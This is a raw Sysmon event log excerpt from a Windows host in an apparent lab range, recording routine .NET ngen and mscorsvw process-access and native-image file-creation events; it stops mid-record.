13:47:27.359{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916F-6005-7A02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:27.359{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916F-6005-7A02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:27.359{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916F-6005-7A02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:27.296{59A5CD1D-916F-6005-7902-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ed8-0\System.Dynamic.dll2021-01-18 13:47:27.296 10341000x80000000000000006675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.999{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916F-6005-7902-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.999{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916F-6005-7902-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:26.999{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916F-6005-7902-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:28.328{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9170-6005-7D02-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:28.312{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9170-6005-7D02-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:28.312{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9170-6005-7D02-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:28.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9170-6005-7C02-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:28.187{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9170-6005-7C02-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:28.187{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9170-6005-7C02-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:28.078{59A5CD1D-916F-6005-7B02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\560-0\System.EnterpriseServices.dll2021-01-18 13:47:28.078 11241100x80000000000000006683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:47:28.062{59A5CD1D-916F-6005-7B02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\560-0\System.EnterpriseServices.Wrapper.dll2021-01-18 13:47:28.062 10341000x80000000000000006701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.874{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9172-6005-8002-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.859{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9172-6005-8002-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:30.859{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9172-6005-8002-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:30.796{59A5CD1D-9172-6005-7F02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b90-0\System.IdentityModel.Selectors.dll2021-01-18 13:47:30.796 10341000x80000000000000006697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:30.656{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9172-6005-7F02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.640{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9172-6005-7F02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:30.640{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9172-6005-7F02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.593{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9172-6005-7E02-00000000A301}4788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.578{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9172-6005-7E02-00000000A301}4788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:30.578{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9172-6005-7E02-00000000A301}4788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:30.453{59A5CD1D-9170-6005-7D02-00000000A301}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\8d0-0\System.IdentityModel.dll2021-01-18 13:47:30.453 10341000x80000000000000006712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.937{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9173-6005-8302-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:31.937{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9173-6005-8302-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:31.937{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9173-6005-8302-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM